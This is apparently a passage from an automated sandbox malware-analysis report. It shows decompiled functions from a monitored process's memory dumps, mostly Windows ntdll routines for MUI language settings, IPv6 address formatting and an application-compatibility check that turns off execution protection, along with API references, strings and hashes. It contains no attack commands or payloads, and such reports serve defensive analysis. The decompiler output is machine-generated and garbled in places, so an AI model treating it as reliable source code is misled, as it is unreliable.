Instruction ID: fbdf59b571a901eefcdfcf86bfa9680329d111587b15b1f5142f710709a765f9
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 02E012B1200208ABDB14EF99CC41EE777ACAF88650F118558BA089B382CA30F9108BF0

Uniqueness

Uniqueness Score: -1.00%

Function 00098620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 41ec7ab19a1a1cfe3868940f58b4777f3bcdd06e05e8724f7211c0fc3ae12589
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 25E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0857342C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: c1cfe86d0508fd5e1fbc3651e45fb5d487ddecafc616ea5c1bf8ba266a155821
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: E9D0A7717903043BEA10FAA49C03F6733CDAB44B00F494064F948D73C3D960F9004561

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02A48788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02A48788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02A48460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E02A2E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E02A4718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02A48460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E02A2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E02A4718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02A48460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02A48460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02A48460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E02A2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E02A2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E02A4718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E02A2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02A22340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E02A3E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E02A2E2A8(_t322,  &_v68, _v16);
								if(E02A45553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E02A3E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E02A2E2A8(_t322,  &_v68, _t236);
								if(E02A45553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E02A2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E02A2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E02A4718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E02A2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02A22340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E02A3E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E02A2E2A8(_v12,  &_v68, _v16);
							if(E02A45553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E02A3E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E02A2E2A8(_t322,  &_v68, _t269);
							if(E02A45553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E02A2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E02A2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E02A4718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E02A2E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02A22340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E02A3E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E02A2E2A8(_v12,  &_v68, _v16);
						if(E02A45553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E02A3E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E02A2E2A8(_t322,  &_v68, _t296);
						if(E02A45553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E02A2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E02A2E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x02a48788
0x02a48788
0x02a48791
0x02a48794
0x02a48798
0x02a4879b
0x02a4879e
0x02a487a1
0x02a487a4
0x02a487a7
0x02a487aa
0x02a487af
0x02a91ad3
0x02a48b0a
0x02a48b0d
0x02a48b13
0x02a48b19
0x02a48b1f
0x02a48b25
0x02a48b2b
0x02a48b31
0x02a48b37
0x02a48b3d
0x02a48b46
0x02a48b46
0x02a487c6
0x02a487d0
0x02a91ae0
0x02a91ae6
0x02a91af8
0x02a91af8
0x02a91afd
0x02a91afe
0x02a91b01
0x02a91b06
0x02a91b06
0x02a487d6
0x02a487f2
0x02a487f7
0x02a48807
0x02a4880a
0x02a4880f
0x02a48810
0x02a48813
0x02a48818
0x02a48818
0x02a4882c
0x02a48831
0x02a48838
0x02a48908
0x02a48920
0x02a489f0
0x02a48a08
0x02a48af6
0x02a48af6
0x02a48af8
0x02a48afb
0x02a91beb
0x02a91beb
0x02a48b04
0x02a91bf8
0x02a91c0e
0x02a91c13
0x02a91c16
0x02a91c16
0x02a91bf8
0x00000000
0x02a48b04
0x02a48a0e
0x02a48a11
0x02a48a14
0x02a48a15
0x02a48a18
0x02a48a22
0x02a48b59
0x02a48a28
0x02a48a3c
0x02a48a3c
0x02a48a42
0x02a91bb0
0x02a91b11
0x02a91b11
0x00000000
0x02a48a48
0x02a48a51
0x02a48a5b
0x02a48a5e
0x02a48a61
0x02a48a69
0x02a48a69
0x02a48a6d
0x00000000
0x00000000
0x02a48a74
0x02a48a7c
0x02a48a7d
0x02a48a91
0x02a48a93
0x02a48a93
0x02a48a98
0x02a48a9b
0x02a48aa1
0x02a48aa1
0x02a48aa4
0x02a48aaa
0x02a48ab1
0x02a48ac5
0x02a48ac7
0x02a48ac7
0x02a48ac5
0x02a48ace
0x02a91bc9
0x02a91bce
0x02a91bd2
0x02a91bd2
0x02a48ad8
0x02a48aeb
0x02a48aeb
0x02a48af0
0x02a48af4
0x00000000
0x02a48af4
0x02a48a42
0x02a48926
0x02a48929
0x02a4892c
0x02a4892d
0x02a48930
0x02a48935
0x02a4893a
0x02a48b51
0x02a48940
0x02a48954
0x02a48954
0x02a4895a
0x02a91b63
0x00000000
0x02a48960
0x02a48969
0x02a48973
0x02a48976
0x02a48979
0x02a4897e
0x02a48981
0x02a48981
0x02a48986
0x00000000
0x00000000
0x02a91b6e
0x02a91b74
0x02a91b7b
0x02a91b8f
0x02a91b91
0x02a91b91
0x02a91b99
0x02a91b9c
0x02a91ba2
0x02a91ba2
0x02a4898c
0x02a48992
0x02a48999
0x02a489ad
0x02a91ba8
0x02a91ba8
0x02a489ad
0x02a489b6
0x02a489c8
0x02a489cd
0x02a489d0
0x02a489d0
0x02a489d6
0x02a489e8
0x02a489e8
0x02a489ed
0x00000000
0x02a489ed
0x02a4895a
0x02a4883e
0x02a48841
0x02a48844
0x02a48845
0x02a48848
0x02a4884d
0x02a48852
0x02a48b49
0x02a48858
0x02a4886c
0x02a4886c
0x02a48872
0x02a91b0e
0x00000000
0x02a48878
0x02a48881
0x02a4888b
0x02a4888e
0x02a48891
0x02a48896
0x02a48899
0x02a48899
0x02a4889e
0x00000000
0x00000000
0x02a91b21
0x02a91b27
0x02a91b2e
0x02a91b42
0x02a91b44
0x02a91b44
0x02a91b4c
0x02a91b4f
0x02a91b55
0x02a91b55
0x02a488a4
0x02a488aa
0x02a488b1
0x02a488c5
0x02a91b5b
0x02a91b5b
0x02a488c5
0x02a488ce
0x02a488e0
0x02a488e5
0x02a488e8
0x02a488e8
0x02a488ee
0x02a48900
0x02a48900
0x02a48905
0x00000000
0x02a48905

APIs

_wcspbrk.LIBCMT ref: 02A48891
_wcspbrk.LIBCMT ref: 02A48979
_wcspbrk.LIBCMT ref: 02A48A61
_wcspbrk.LIBCMT ref: 02A48A9B
_wcspbrk.LIBCMT ref: 02A91B9C

Strings

WindowsExcludedProcs, xrefs: 02A487C1
Kernel-MUI-Language-Allowed, xrefs: 02A48827
Kernel-MUI-Language-Disallowed, xrefs: 02A48914
Kernel-MUI-Number-Allowed, xrefs: 02A487E6
Kernel-MUI-Language-SKU, xrefs: 02A489FC

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 0dd7c03110b710632504229675231ebf8bb9cbd9392e4423155c84cbba2f5301
Instruction ID: b3270cf313e024a45239a26c4666ff560eeef21d99bcf1e594dc85342ba0db74
Opcode Fuzzy Hash: 0dd7c03110b710632504229675231ebf8bb9cbd9392e4423155c84cbba2f5301
Instruction Fuzzy Hash: 51F1F6B2D40219EFCF11DF99CA809EEB7B9BF48304F15446AE605A7210EB34EA45DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02A613CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E02A613CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02A57707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2a22926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02A57707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2a29cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02A57707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02A57707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02A57707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02A57707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x02a613d5
0x02a613d9
0x02a613dc
0x02a613de
0x02a613e1
0x02a613e8
0x02a613ee
0x02a8e8fd
0x00000000
0x02a8e921
0x02a8e921
0x02a8e928
0x02a8e982
0x02a8e98a
0x00000000
0x02a8e99a
0x02a8e99e
0x02a8e9a3
0x02a8e9a8
0x02a8e9b9
0x02a8e978
0x00000000
0x02a8e978
0x02a8e98a
0x02a8e92a
0x02a8e931
0x02a8e944
0x02a8e944
0x02a8e950
0x02a8e954
0x02a8e959
0x02a8e95e
0x02a8e963
0x02a8e970
0x00000000
0x02a8e975
0x02a8e93b
0x02a8e980
0x00000000
0x02a8e980
0x02a8e942
0x02a8e94b
0x00000000
0x02a8e94b
0x00000000
0x02a8e942
0x02a613f4
0x02a613f4
0x02a613f9
0x02a613fc
0x02a613ff
0x02a61406
0x02a8e9cc
0x02a8e9d2
0x02a8e9d2
0x02a8e9cc
0x02a6140c
0x02a61411
0x02a61431
0x02a6143a
0x02a6143c
0x02a6143f
0x02a6143f
0x02a61442
0x02a61447
0x02a614a8
0x02a614ac
0x02a8e9e2
0x02a8e9e7
0x02a8e9ec
0x02a8ea05
0x02a8ea05
0x00000000
0x02a61449
0x00000000
0x02a61449
0x02a6144c
0x02a61459
0x02a61462
0x02a61469
0x02a6146a
0x02a61470
0x02a61473
0x02a61476
0x02a61476
0x02a61490
0x02a61495
0x02a6138e
0x02a61390
0x02a61397
0x02a61398
0x02a61399
0x02a613a1
0x02a613a4
0x02a613a4
0x02a61498
0x02a6149c
0x02a6149f
0x02a614a2
0x00000000
0x00000000
0x02a614a4
0x00000000
0x02a614a4
0x02a61413
0x02a61415
0x02a61416
0x02a61419
0x02a6141c
0x02a61422
0x02a613b7
0x02a613bc
0x02a613bf
0x02a613bf
0x02a613c2
0x02a61424
0x02a61424
0x02a61424
0x02a61427
0x02a6142b
0x02a6142c
0x02a6142c
0x02a6142c
0x00000000
0x02a6141c
0x02a61411

APIs

___swprintf_l.LIBCMT ref: 02A6146B
___swprintf_l.LIBCMT ref: 02A61490
___swprintf_l.LIBCMT ref: 02A8E970

Strings

::%hs%u.%u.%u.%u, xrefs: 02A8E967
ffff:, xrefs: 02A8E94B
:%u.%u.%u.%u, xrefs: 02A8E9F4
::ffff:0:%u.%u.%u.%u, xrefs: 02A8E9B0

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b1aae491c9e3fe7249a0c75c04db91cd35dcb2f417e7a1bbd5e2586b0df43ce2
Instruction ID: 74663f8044f01cad432544b3133b63ea1eedf4f87808b5d3ef5d278905bf2d43
Opcode Fuzzy Hash: b1aae491c9e3fe7249a0c75c04db91cd35dcb2f417e7a1bbd5e2586b0df43ce2
Instruction Fuzzy Hash: B76105B1900665EADF24DF59C9C89BFBFB5EF84300B18C16DE49A47A40DB74A640DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A57EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02A57EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2b02088; // 0x7765217c
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02A57F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02A73F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E02A2DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2b04218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02A73F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02A30D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02A73F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02A38375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02A73F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E02A9E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02A73F92();
					_t38 = 1;
					L2:
					return E02A2E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x02a57f08
0x02a57f0f
0x02a57f12
0x02a57f1b
0x02a57f31
0x02a73ead
0x02a73eb4
0x00000000
0x00000000
0x02a73eba
0x02a73ecd
0x02a73ed2
0x02a73ee1
0x02a73ee7
0x02a73eec
0x02a73f12
0x02a73f18
0x02a73f1a
0x00000000
0x00000000
0x02a73f20
0x02a73f26
0x02a73f28
0x00000000
0x00000000
0x02a73f2e
0x02a73f30
0x00000000
0x00000000
0x02a73f3a
0x02a73f3b
0x02a73f53
0x02a73f64
0x02a73f69
0x02a73f6c
0x02a73f6d
0x02a73f6f
0x02a7e304
0x02a7e30f
0x02a7e315
0x02a7e31e
0x02a7e321
0x02a7e327
0x02a7e329
0x00000000
0x00000000
0x00000000
0x00000000
0x02a7e32f
0x02a7e32f
0x02a7e337
0x02a7e33a
0x02a7e33b
0x02a7e33d
0x02a7e33f
0x02a7e341
0x02a7e341
0x02a7e34e
0x02a7e353
0x02a7e358
0x02a7e35d
0x02a7e35f
0x00000000
0x00000000
0x02a7e365
0x02a7e365
0x02a7e368
0x02a7e36e
0x00000000
0x00000000
0x02a7e374
0x02a7e32f
0x02a73f75
0x02a73f7a
0x02a73f7c
0x02a73f7e
0x02a73f86
0x02a57f39
0x02a57f47
0x02a57f47
0x02a57f37
0x02a57f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02A73F12

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02A73F4A
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02A73EC4
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02A73F75
CLIENT(ntdll): Processing section info %ws..., xrefs: 02A7E345
Execute=1, xrefs: 02A73F5E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02A7E2FB
ExecuteOptions, xrefs: 02A73F04

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
